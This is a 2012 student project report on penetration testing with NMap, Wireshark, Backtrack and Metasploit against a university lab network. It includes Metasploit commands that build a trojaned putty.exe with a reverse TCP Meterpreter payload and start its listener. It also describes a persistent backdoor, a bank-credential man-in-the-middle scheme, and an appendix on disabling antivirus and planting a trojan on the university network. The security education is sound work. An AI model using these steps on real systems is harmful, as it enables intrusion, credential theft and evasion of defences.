Security Assessment and Analysis with Penetration Tools ...itech.fgcu.edu/faculty/zalewski/CEN4935/Projects/Metasploit... · Network Security Penetration Tools and Wireshark Security

Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 1 | P a g e Fall 2012

Network Security Penetration Tools and Wireshark

Security Assessment and Analysis with

Penetration Tools and Wireshark

(Final Draft)

Ryan A. Drozdowski, Mike Hannaford, James Royal

Instructor: Dr. Janusz Zalewski

CNT 4104 Fall 2012 – Networks

Florida Gulf Coast University

Fort Myers, Florida

12-11-2012



1. Introduction

Network security is very important whether it is personal or business making sure that the

information on these networks isn’t accessible by unauthorized users. One must make sure that

the information on a network isn’t easily accessed without proper permission. Penetration tools

are perfect for someone to test security of a network because they are very similar to what

hackers really use or do depending on the software. [7] A heavily supported operating system

that supports many penetration tools is Backtrack. Although the project is using only a few

features of Backtrack there are many more available. A great starting tool is NMap which allows

someone to map out the confirmation of activities on the network and alert the user of possible

security issues. [1] Then there is Metasploit which is a tool used to perform attacks also known

as exploits on a certain part of the network.[2] Metasploit can be used to hack in to a network

and do detrimental things to a computer on a network. Wireshark is a great tool for monitoring

and analyzing data transfer [6]. As data travels over a wire or via a wireless network WireShark

picks up the packets traveling over the network and makes this available to the user via a

sophisticated graphical user interface.

This project is an extension of previous class projects using these three tools Metasploit,

NMap, WireShark with the addition of Backtrack 5 an operating system. The following section

provides brief introductions to all three tools: Metasploit, NMap, and WireShark and discusses

the problem addressed in this project and the methods of its solution.



2. Previous Accomplishments

2.1 Metasploit

The pervious projects’ objective was to install Metasploit on a virtual machine to perform

penetration testing. With the virtual machines put in place the main goal was to find

vulnerabilities and deliver payloads to these virtual machines. Once the test has been completed

the next goal was to test it against the Computer Science lab network to see if there exist

vulnerabilities and if so exploit them.

The project started with downloading Metasploit and basic configuration. Metasploit

application was installed on a Windows platform running Windows 7 x64. With the installation

of Metasploit framework all the firewalls and anti-virus software had to be shutdown because of

the nature of penetration testing the computer you’re working on may think you are an intruder

and may prevent certain actions.

Oracle’s VirtualBox was installed as the virtual machine on the same machine as the

Metasploit is installed. Once the VirtualBox was installed a virtual machine was running a Linux

Ubuntu and Windows XP.

The last piece of software to have been installed on the machine was Armitage. Armitage is a

user interface for Metasploit. That makes it very nice and easy to navigate with Metasploit which

itself is a command line program natively. Armitage was downloaded and then set to work on the

Metasploit framework installed on this machine.

The start up of Armitage which automatically activates Metasploit and then the virtual

machine running the Linux OS are required. Once both applications are running the penetration

testing is started. Armitage is then used to scan the Computer Science lab network IP address

69.88.163.0/24 as shown in Figures 2.1.1-2.1.3 to display all machines running on the network.



Figure 2.1.1- Quick Scan. [4]



Figure 2.1.2- Scan range. [4]



Figure 2.1.3 - After a scan of the network. [4]

With this all computers available to attack shown, the virtual machine is running on the local

host with IP address 192.168.56.102. The icon of the machine can then be right-clicked with a

drop down menu and scanned as shown in Figure 2.1.5. When the scan completes all ports

identified are shown on the virtual machine as illustrated in Figure 2.1.6. Then one can click

Attacks on the task bar. When this is done all the available attacks are then shown under the

Attacks menu. The exploit tomcat_mgr_deploy can then be selected and a window appears with

attack information where all the information is checked to select launch as shown in Figure 2.1.7.

This attack will launch a Meterpreter to communicate with attacked virtual machine. The

Armitage user interface will display the attacked machine with lightning bolts as shown in Figure

2.1.8.



Figure 2.1.4 – Local machine and Measplotiable virtual machine. [4]

Figure 2.1.5 – Drop down menu options for this machine. Select Scan. [4]

Figure 2.1.6 - Services tab for Measplotiable machine. [4]



Figure 2.1.7 - Attack list showing available exploits. [4]

Figure 2.1.8 – Exploited Measplotiable machine.

A similar attack was attempted on the Florida Gulf Coast University Computer Science

Lab Network which proved to be unsuccessful. This leads to the conclusion that the network has

no known vulnerabilities at that time. [4] The main goal of this previous project was achieved

but not the secondary goal which is penetrating the Computer Science network.



2.2 NMap

The pervious projects’ objective was to use of two different applications first,

NMap was to detect open ports with the hopes of finding vulnerabilities. The second

application was SNORT is an intrusion detection system. With these two applications the

goal was to use NMap to attack a computer on the network while concurrently running

SNORT to try and detect the attack done by NMap.

The previous project’s goal was to utilize both NMap and SNORT, so it started by

attempting to understand the software: both its capabilities and its limitations. With this, the

project was then given a test of both applications. This was to make sure both applications

anticipated.

SNORT was the first challenge and a custom SNORT detection rules using MYSQL

server were written. SNORT, which has a feature that allows a user to write custom detection

rules for a particular environment.

NMap was then mapped out how it would scan the network shown in Figure 2.2.1. NMap

is a command line application with a lot of options; most are available on every network or

environment.

Figure 2.2.1 NMap plan for attack. [5]



This all was to be performed within a virtual environment NMap running on Windows 7

and the SNORT running on Ubuntu Linux as shown in Figure 2.2.2. SNORT was then started

and the custom rules were imported to the system. Then the NMap application was started.

With SNORT running with its custom rules imported, detected and logged all of NMap’s

scans even with its flexibility and custom command line scans.

Figure 2.2.2 Map of the Network. [5]

The conclusion of this project was that both NMap and SNORT have very useful

functionality and flexibility. SNORT could be expanded to a greater set of rules to detect and

log far more data to prevent intrusion and allow for a more secure network.



2.3Wireshark

The previous WireShark project’s primary goal was to setup the software on a

Windows based personal computer in the Computer Science lab along with a USB device

called AirPcap [3]. The project was more of an understanding the software and all its features

with little implementation of the software where useful data were collected and a conclusion

was drawn that one could tell what was going on over a wireless network effectively.

The WireShark is an open source program downloadable from the web at

wireshark.org. One must select which operating system is to be used then select download.

Along with downloading WireShark another pieces of software that must also be downloaded

and installed is WinPCap. If one follows the on screen prompt, it will ask if one wishes to

install it. So make sure it is selected as shown in Figure 2.3.1.

Figure 2.3.1 Prompt to download WinPCap. [1]

The next step is to insert the AirPcap USB device. Once inserted it will prompt to

download the driver. This must be done to use the software as shown in Figure 2.3.2. Once



all this software has been downloaded, one can launch WireShark and sniff packets over a

wireless network.

Figure 2.3.2 Prompt to download the AirPcap driver. [1]

With WireShark running, one must select the AirPcap as the interface. Then the

scan automatically starts as shown in Figures 2.3.3-2.3.4. Once running it was discovered

that one could filter the scan either by IP filters or protocol filters. This was used to limit the

scan to only “cups” which is packets using the Common Unix Printing System Protocol [1]

as shown in Figure 2.3.5. After some analyzing of the data, Apple computers were singled

out and the IP address and the type of printer, as shown in Figure 2.3.6, were displayed.



Figure 2.3.3 Select AirPcap as the interface. [1]

Figure 2.3.4 Sniffing packets over the network. [1]



Figure 2.3.5 The filtered out packets. [1]

Figure 2.3.6 Displays the individual packets with their relevant data. [1]



3. Problem Description

Given the four tools described in the previous section, the plan was to attempt a hack in

to a computer or embedded system over the Computer Science lab wireless network. Each of the

three penetration tools will be used; NMap, Metasploit, and WireShark, will have its own role to

play, with addition of Backtrack [11].

Backtrack’s role is to be the intermediary, as it has: NMap and Metasploit built in to its

framework. This software has integrated both programs making it the top choice for the project

to execute a successful attack. Backtrack is installed onto the attacking computer giving us

access to the penetration tools.

NMap’s role is to detect and map out all the computers on the wireless network shown in

Figure 3.1. The NMap gives the potential ability to see IP addresses, open ports, closed ports and

the associated operating system of the machine on a given IP address. This constitutes the first

part of the project which is mapping out the network.

Figure 3.1 - Computer Science Wireless Network.



Metasploit is then used to create an exploit that will disguise an attacking program to

look like a normal program for example “putty.exe”. When this exploit is placed on a USB stick

and the user clicks on it and saves the file they will receive a “putty.exe” file with the exploit

embedded. Once the program “putty.exe” is launched on the users’ computer it will function like

“putty.exe” but the exploit will then notify the attacking computer that the file is up and running.

This allows some ports to open on that machine so that Metasploit can then penetrate without the

knowledge of the user and perform attacks against it.

WireShark can be used for monitoring the attack and watching the data packet exchange.

The monitoring can be started from the NMap to the exploit being installed, then the attack being

performed by Metasploit. With this knowledge the idea is to see if an attack can be done on

another device and if the attack could be prevented by seeing if certain packet transfers are

malicious attacks on the network shown in Figure 3.2.

Figure 3.2 – Map of the Attack over the Network - Computer 1 attacking Computer 2 while

Computer 5 monitors all packet transfer.

4. Preparation



4.1 NMap the CS Network

NMap is used to map out the Computer Science lab’s wireless network. The first

task is to analyze the network which is going to be attacked. NMap is perfect for this

task. The first command the project will require is nmap “–O 69.88.163.0/24” as shown

in Figure 4.1. This command allows one to see all systems on IP address range

69.88.163.0/24 and displays the operating systems. These data can be used to customize

an exploit to attack the specific computer. The one selected will be a Windows 7 pc with

the IP address 69.88.163.240.

Figure 4.1 Command to display operating systems on the IP range 69.88.163.0/24.

4.2 Running and Setting Up WireShark

WireShark is set up to monitor the Computer Science network effectively and

efficiently. The AirPcap drivers need to be installed for this purpose. After installation

has completed, the AirPcap has to be inserted in the USB port and the wireless

networking card will be turned off. After all this has been completed, WireShark is ready

to start, using the AirPcap as the selected sniffing interface. After several minutes

WireShark will capture about 30,000 data packets over all the wireless networks in the

area. There must be a software filter to narrow down the number of recorded packets.

Using filter ”ip.src == 69.88.163.240 || ip.dst == 69.88.163.240” as shown in Figure 4.2,

sorts through the data and finds only data packets sent and received from the computer

with IP Address 69.88.163.240, which is a computer running in the Computer Science

lab. This filtering command is then saved into WireShark’s filtering system. This allows

future the monitoring of the planned attacks on a computer on the Computer Science

Wireless Network. This can also be done for the attacking computer.



Figure 4.2 Filtering out ip address 69.88.163.240 as the source and destination.

4.3 Backtrack Setup

Backtrack is the operating system used in this project to facilitate the attacks. It is

saved on a USB stick to be used on any computer. To launch the operating system one

must first go into the BIOS of the computer and change the system boot order so that the

USB is the first in the order. Once that has been completed, then during the boot screen

will then confirm if one wants to boot from USB. Once the operating system is booted on

the computer there is another boot screen from the Backtrack. The option that must be

selected is Backtrack is persistent text mode boot. Then a command prompt appears to

start the desktop with “startx”. Once it is finished loading, the Backtrack operating

system is ready to use as shown in Figure 4.3.

Figure 4.3 Backtrack desktop screen.

4.4 Customizing an Exploit using Metasploit



Metasploit is a built in application within the Backtrack operating system. To start

Metasploit one must start up the Konsole window. Once the Konsole console window is

started, the command “msfconsole” must be entered. This will launch the Metasploit

console as shown in Figure 4.4. If at any time one needs help in the Metasploit window,

the command “help” can be entered.

Figure 4.4 Metasploit framework.

To create exploit one must first know what payload one wishes to use. For the

project we used NMap and found a Windows 7 PC so the selected payload was reverse

TCP. To create this exploit one must type “use

payload/windows/meterpreter/reverse_tcp” as shown in Figure 4.5. Once the payload is

loaded into Metasploit, type “show options” to see what is required for this payload as

shown in Figure 4.6. This will show that the LHOST and LPORT must be set. The

LHOST is the listening computers IP address and the LPORT is the port that the

computer will be listening on. To set the LHOST type “set LHOST = 69.88.163.15”. To

set the LPORT type “set LPORT = 5001”. Those are the attribute of our attacking



computer. With these properties set one can create the exploit. The exploit can be

attached to any executable so the chosen program was “putty.exe”.

To generate this infected program type “generate –k –t exe –x /tmp/putty.exe –f

/tmp/putty_pro.exe” as shown in Figure 4.7. The “–k –t exe” tells the exploit generator

that the program being generated will be of extension exe. The “-x /tmp/putty.exe” tells

the exploit generator the source file path. Then the “-f /tmp/putty_pro.exe” tells the

exploit generator the new executable’s name and file path. Once the file is created type

“back” to exit the payload menu and return to the main menu within Metasploit.

Figure 4.5 Loading the reverse TCP payload.



Figure 4.6 Shows options for the payload.

Figure 4.7 Generates the infected executable.

Now that the exploit has been created it is time to launch the listener for that

exploit. Type “use exploit/multi/handler” as shown in Figure 4.8 this will bring you to the

screen, where one can listen for the exploit. Once again, one must set both the LHOST

and LPORT to the IP address and the port number that is selected for the payload as

shown in Figure 4.9. Once that has been completed, typing “exploit” wait launch the

program as shown in Figure 4.10.



Figure 4.8 Launches the exploit handler.

Figure 4.9 Sets the listening host.



Figure 4.10 Starts to listen for the exploit.



5. Implementation

5.1 Methodology

5.1.1 Reverse TCP

The reverse TCP connection is usually used to bypass firewall restrictions

on open ports. The firewall usually blocks open ports, but does not block outgoing

traffic. In a normal forward connection, a client connects to a server through the

server's open port, but in the case of a reverse connection, the client opens the port

that the server connects to. The most common way a reverse connection is used is

to bypass firewall and Router security restrictions.

5.1.2 Trojan Horse

The Trojan Horse is an executable running on the computer behind a

firewall. This can open an outgoing connection to an external source. Once the

connection is made one can send commands to that computer

5.1.3 Man in the Middle

Another benefit to using Backtrack is the use of Ettercap. Ettercap is a

piece of software, which makes initiating a man in the middle attack easy. A man

in the middle attack is the process of routing all data packets on the specified

network through a given computer on the network before sending them out to the

Internet. This attack allows the computer initiating the attack to validate packets

and reroute them as needed.

A malicious example of this would be if some of the users of the network

used the network to do their online banking. The user generating the man in the

middle attack wants all usernames and passwords for the users on the network

attempting to access Bank of America's website. The user generating the man in



the middle attack would then sift through all the data packets on the network

rerouting the packets with the destination IP address of Bank of America's

website to a different desired destination IP which serves a clone of the Bank of

Americas website. The end user has no knowledge of the reroute and would

continue to enter their login credentials as usual. Once the user hits the submit

button, the attacker gains their private information.

5.1.4 Daemon

This project makes use of Metasploit in order to generate Payloads.

Metasploit comes with several Payloads for one to use, but also has the ability to

generate them if one needs to. This is where Daemons come in to play in this

project. Daemons are essentially background processes in operating systems.

They are scripts that run in the background. They are headless meaning they do

not contain a graphical user interface. It’s like a small program running in the

operating system that the end user does not see. Daemons can be configured to

start when the operating system boots, and shut down when the operating system

terminates.

This project creates a Payload that is disguised as the open source

putty.exe application that is used as SSH and FTP client. The Payload which is

the customized putty.exe application looks, feels, and executes exactly like the

putty.exe application downloaded from the Internet. The only difference is that

when one opens this generated Payload (putty.exe) file on the target system the

Payload sends a reverse TCP connection back to the attacking system, which

allows the attacking system access to the target system. The issue with this is that

the attacking system only has access as long as our payload is running on the

target system. Once the user of the target system exits the Payload it closes the

reverse TCP connection.

Daemons make creating a back door into the target system a breeze. A

back door is the process of creating an entry point on the target system so that the



user of the attacking system can gain access to it any time they want. This would

remove the limitation of our Payload described in the previous paragraph. In

order to create a back door on the target system one would need to gain super user

privileges on the target system. This can be achieved with some of the other tools

Backtrack provides but is out of the scope of this project. This is to inform one on

the process of creating a back door. Once one has super user privileges on the

target system they would simple need to view the processes running on the target.

Our Payload is generated as a system process on the target system. One is

the true putty.exe application and the other is the reverse TCP connection back to

the attacking computer. With creating a daemon the reverse TCP connection is to

be activated when the targeted computer system starts and to stop it when the

system shuts down. One could gain access to the target system any time of the day

as long as it was turned on without the need for the Payload's execution.

5.1.5 Exploits and Payloads

Once the best vulnerability has been discovered in a network, a small and

specialized computer program, called an exploit, is used to take advantage of the

vulnerability and give the penetration tester access to the computer system. The

exploits are used to deliver the payloads to the target system. These payloads are

the way that the penetration tester gains access to the computer. Payloads are

introduced in the next paragraph.

There are approximately over 180 exploits in the Metasploit Framework.

Since the security community is encouraged to get involved in the continuing

development of exploits there is currently a public database of usable exploits.

The exploit database is constantly being updated by community support and when

new exploits are found they are posted. [4]

Payloads are pieces of code that get executed on the target system as part

of an exploit attempt. A payload is usually sequence of assembly instructions,

which helps achieve a specific post-exploitation objective, such as adding a new



user to the remote system, or launching a command prompt and binding it to a

local port.

Traditionally, payloads were created from scratch or modifying existing

pieces of assembly code. This requires an in-depth knowledge not only of

assembly programming, but also of the internal workings of the target operating

system. But a number of scripts now enable payloads to be developed without

needing to modify any assembly code at all. The different types of payloads allow

for different types of control the penetration tester has over the target system. The

most commonly used payload is called the Meterpreter. This payload allows the

penetration tester to turn on the target systems webcam, take control of the mouse,

keyboard and even take screenshots. All of these options are for the penetration

tester to see what exact holes there are in the system. Having access to key

functions on one computer may not necessarily mean control over the whole

network, but it is a start in determining which aspects of the network are the most

vulnerable. [4]

5.1.6 Backtrack 5

Backtrack Linux is a version of an open source Linux operating system

that is licensed under the GPL open source license. Backtrack is used by network

professionals in the industry and is considered the standard operating system for

digital forensics, and penetration testing. The operating system is named after the

well known backtracking algorithm and its current version is Backtrack 5 r3

which is the version that this project is using.

Backtrack comes with Metasploit and NMap completely installed in the

standard ISO image download, as well as with many other great tools for

penetration testing such as Aircrack-ng which enables the ability to crack WEP

and WPA wireless passwords, Snort which enables ability to sniff out packets on

a given network, Kismit which is an intrusion detection system, Ophcrack which

is a windows password cracker that uses LM Hashes through Rainbow tables.,



and Ettercap which is specifically designed for man in the middle attacks. These

are just a handful of great penetration applications that come with Backtrack.

All of these tools are integrated deep into the operating system which

allows for ease of use when it comes to testing a specified network. One can

install some of these tools on other operating systems but most of the tools listed

here are designed to work best with Backtrack. It is encouraged that if one must

take on the task of penetration testing of any network one should use Backtrack

Linux as the preferred operating system to do so. Backtrack makes the use of

these programs easy and straightforward without the need of customizing an

operating system of choice in such a way to use these programs.

The benefit of using Backtrack is that it is easily installed onto a USB

drive. Due to the fact that Backtrack is based on Linux the specified hardware

requirements are not as demanding as for a standard operating system. Backtrack

can run on 512 megabytes of RAM and only consumes about 1 Gigabyte of hard

drive space. Per this requirement one can easily install Backtrack onto a USB

drive and boot into the operating system from just about any computer on any

network. This operating system can allow someone with malicious intent to take

down an enterprise system and destroy or compromise valuable data like credit

card information, privacy information such as social security numbers, and now

with the advancements of GPS systems one could obtain location information if

they were searching for someone with the intent to do bodily harm.

5.2 Testing Experiments

For all the test cases the preparation described in previous sections has not

changed and the attacking computer is already in the listening stage as well as the

Wireshark computer is also already sniffing.

The assumption is that all the directions given in the previous sections have been

completed. For the experiment the use of three computers is needed. The first is the

computer with Backtrack running the exploit with IP address 69.88.163.15. The next is



the computer being attacked wirelessly with IP address 69.88.163.240. Last the third

computer has to run Wireshark to sniff the wireless packets. These three computers are

referred to by exploit computer, attacked computer and Wireshark computer. They are all

in their respective waiting stage as shown in Figures 5.1-5.3. The exploit computer is

listening at IP 69.88.163.15 on port 5001. The attacked computer is about to click on the

putty_pro.exe application. Wireshark is scanning packets with the filter “ip.scr ==

69.88.163.240 || ip.dst == 69.88.163.240”.

Figure 5.1: Exploit computer listening on IP 69.88.163.15 and port 5001.



Figure 5.2: Attacked computer, with application to be clicked.

Figure 5.3: Wireshark computer sniffing wireless packets with a filter in place.



The first step to be done is make a connection. So the attacked computer will click

on the “putty_pro.exe” application. Once that has been done the exploit computer is

connected as shown in Figure 5.4. Then Wireshark will detect the connection as shown in

Figure 5.5.

Figure 5.4: Exploit computer makes the reverse TCP connection.



Figure 5.5: Wireshark computer see the packets that make the connection.

Once the connection has been created one can call commands all of which can be

found in the Appendix or by typing “?” into the exploit computer. The first command that is used

by the exploit computer is “ps” as shown in Figure 5.6. The output shows all the processes

running on the attacked computer. The attacked computer has no knowledge of this command

being executed. Wireshark will detect the TCP transfer protocol packets transferred between the

exploit computer and the attacked computer as shown Figure 5.7.



Figure 5.6: Exploit computer entering “ps” command showing all processes on the targeted

computer.



Figure 5.7: Wireshark computer shows TCP packets that were captured the moment after the

command “ps”.



With the processes being displayed in the exploit computer one can select an ID

to kill the process as shown in Figure 5.8. The process that is going to be killed is 5040

which is Internet Explorer on the attacked computer as shown in Figure 5.9. After typing

“kill 5040” on the Exploit computer as shown in Figure 5.10, Internet explorer on the

attacked computer will close as shown in Figure 5.11. Wireshark will capture the TCP

packets that are sent to execute the kill command as shown in Figure 5.12. This is the end

of the experiment.

Figure 5.8: Exploit computer selects the process to kill.



Figure 5.9: Attacked computer has Internet Explorer window open.

Figure 5.10: Exploit computer killing process ID 5040 or Internet Explorer.



Figure 5.11: Attacked computer showing that Internet Explorer was killed by the exploit

computer.



Figure 5.12: Wireshark computer captured the packets moments after the kill command is

executed.



6. Conclusion

Security assessment and analysis are complex concepts and require complex tools such as

Backtrack, NMap, Metasploit, and Wireshark. NMap is a great tool for preliminary testing such

as finding a system to attack or just seeing what’s on the network. But it doesn’t allow much of

anything else but a starting point. Wireshark is a similar tool, since it monitors packets over a

network wired or wireless. It won’t directly tell anything but it might alert users to a possible

threat. Backtrack with the Metasploit frame work built in is the bulk of the penetration testing, as

it allows to test and see, for example if your antivirus is any, good among other things.

Separately none of these tools software would have been useful but together they allow for very

practical applications.

The Metasploit exploit yielded success in allowing full control over the attacked

computer. It also allowed the viewing of all running processes. Then one can use commands to

killed selected processes. With this there may be some other “hacks” performed, such as the one

described in Appendix A. This may lead someone to try other exploits. The limitation of

Metasploit is only the user’s knowledge of the network and the systems running on it.

Wireshark yielded some success but it didn’t tell much about the attack on the wireless

computer. What it did show was a lot of communication between the two computers as well as

the fact that none of the TCP packets were transmitted a 100% which shouldn’t be the case in a

normal environment. For Wireshark to work functionally one would have to have an in-depth

understanding of the network and its behaviors, otherwise one would never gather useful

information from all the packets.

Further advancement for this type of project would be to investigate the other exploits

and perhaps find a way to spread the exploit to multiple computers quickly. NMap and

Metasploit have more capabilities than those described in this project. Backtrack also supports

different penetration testing tool such as: AirCarck-ng which is used to crack WEP and WPA

passwords. Furthermore, other tools, such as Nessus, could be added to expand the project.



Appendix A: Steps for performing a hack on FGCU’s network

As an exercise in checking security violation and protection, an attempt was made to

check vulnerability of Florida Gulf Coast University’s enterprise network. The following actions

were preformed to prove the vulnerability.

Step one: Stopping the Antivirus on the targeted computer

This can be done by a couple of simple system calls from a C++ program. As

proven by Chris Ruskai writing a simple C++ program that suspends the antivirus

and disables it is possible. The code is not included in the report but submitted

separately to instructor.

Step two: Placing Infected Program on the targeted computer

Create an exploit, as described in the previous section, which runs automatically

for example the Java updater. This allows the attack to go completely unnoticed.

Another way is to use infected putty.exe, which automatically connects to another

computer. Then shut down the computer.

Step three: Waiting for the connection between the attacking computer and the targeted

computer.

Once the targeted computer is started the Trojan will be launched and the

listening attacking computer will then have complete access to the targeted

computer.

Notes: Although this procedure will allow complete access to the targeted computer and its

system one only has about a 30-45 minute time slot before the antivirus will be automatically

launched again over the network, because of the security procedure put in place over the

enterprise network. If one studies the protection system well enough, once it launches again it

can be killed from the Meterpreter before it removes the Trojan.



Figure A.1: Diagram of the Network



Appendix B: Exploit Commands

This Appendix includes screens shots of specific commands, which are useful for

performing an attack.

Figure B.1 Core Commands

Figure B.2 File System Commands.

Figure B.3 Networking Commands.

Figure B.4 System Commands.

Figure B.5 User Interface Commands.

Figure B.6 Webcam Commands.

Figure B.7 Elevate Commands.

Figure B.8 Passwords Database Commands.

Figure B.9 Timestomp Commands.



Figure B.1 Core Commands.



Figure B.2 File System Commands.

Figure B.3 Networking Commands.



Figure B.4 System Commands.

Figure B.5 User Interface Commands.



Figure B.6 Webcam Commands.

Figure B.7 Elevate Commands.

Figure B.8 Passwords Database Commands.



Figure B.9 Timestomp Commands.



7. References

[1] Marsh, N. “NMap cookbook”, CreateSpace Independent Publishing Platform, Lexington, KY

August, 20118

[2] Kennedy, D., O’Gorman, J., Kearns, D., and Aharoni, M. “Metasploit the Penetration

Tester’s Guide”, no starch press, San Francisco, 2011

[3] Gehring, J. “WireShark”, FGCU, 2011, URL:

http://itech.fgcu.edu/faculty/zalewski/projects/files/WiresharkReport2011.pdf

[4] Steiner, C. “Metasploit”, FGCU, 2011, URL:

http://itech.fgcu.edu/faculty/zalewski/projects/files/MetasploitReport2011.pdf

[5] Carestia, E. “NMap and SNORT“, FGCU, 2011, URL:

http://itech.fgcu.edu/faculty/zalewski/projects/files/Nmap_and_SNORT_2011.pdf

[6] Wireshark, October, 2012 URL: http://www.wireshark.org/

[7] Agle, M. “A Penetration Tester’s Toolkit”, Linux Journal, vol.2012, no. 213, pp. 78 – 90,

January, 2012 URL: linuxjournal.com

[8] Mudge, R. “Live-fire security testing with Armitage and Metasploit”, vol. 2011, no. 205, pp.

44-49 May, 2011URL: linuxjournal.com

[9] NMap User Documentation, 2012 URL: http://nmap.org/book/man.html

[10] WireShark Display Filters, October, 2012, URL: http://wiki.wireshark.org/DisplayFilters

[11] Backtrack 5, 2012 URL: http://www.backtrack-linix.org/downloads

Documents

Security Assessment and Analysis with Penetration Tools ...itech.fgcu.edu/faculty/zalewski/CEN4935/Projects/Metasploit... · Network Security Penetration Tools and Wireshark Security